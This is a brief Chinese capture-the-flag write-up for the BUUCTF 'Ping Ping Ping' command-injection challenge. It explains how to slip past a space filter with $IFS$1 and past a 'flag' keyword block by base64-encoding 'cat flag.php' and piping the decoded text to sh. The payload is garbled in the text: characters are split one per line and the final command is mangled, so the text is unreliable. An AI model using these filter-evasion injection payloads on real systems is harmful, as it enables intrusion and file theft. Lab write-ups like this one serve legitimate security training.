buuctf-Ping Ping Ping
看着界面,是一道命令执行题
构造payload
Ls查询下
空格被过滤了
$IFS$1代替
Flag也被过滤了,试试index
一些被过滤的参数。根据这些构造payload
这里吧cat flag.php用base64编码一下
构造payload
echo$IFS
1
Y
2
F
0
I
G
Z
s
Y
W
c
u
c
G
h
w
∣
b
a
s
e
64
1Y2F0IGZsYWcucGhw|base64
1Y2F0IGZsYWcucGhw∣base64IFS$1-d|sh